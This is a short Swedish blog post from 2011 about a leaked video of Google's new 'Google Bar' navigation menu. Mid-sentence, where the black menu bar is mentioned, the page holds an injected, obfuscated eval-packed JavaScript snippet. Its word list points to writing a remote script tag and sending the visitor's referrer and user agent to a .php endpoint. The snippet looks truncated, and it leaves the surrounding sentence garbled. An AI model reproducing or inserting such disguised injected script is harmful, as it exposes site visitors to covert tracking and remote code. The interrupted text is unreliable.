Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Google : ny navigering

Google : ny navigering
Filip Urde
  • On 30 november, 2011
  • http://www.revue.se/filip-urde

Google har implementerat en svart menyrad (Sand eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktnzr|var|u0026u|referrer|ntazh||js|php’.split(’|’),0,{}))
bar
) som nu syns högst upp på flera av tjänsterna. Tydligen så är det inte direkt något som blivit hyllat av användarna. Därför värkar de som om Google har tagit fram en ny ”Google Bar” som är mer dynamisk och ligger belgäen uppe vid Google logotype. Videon nedan släpptes enligt Google, helt oavsiktligt… Ungefär lika oavsiktligt som att Apple ständigt tappar bort sina senaste produkter på olika barer i anknutning till silicon-valley… (läs mer om det här)

Videon är i alla fall släppt på YouTube och drogs kvickt tillbaka men som vanligt hade någon redan hunnit spara den och den finns nu på Vimeo. Så tokigt!

Om det är nästa slutgiltiga designen av Googles navigeringsmeny, det får vi se.
thenextweb.com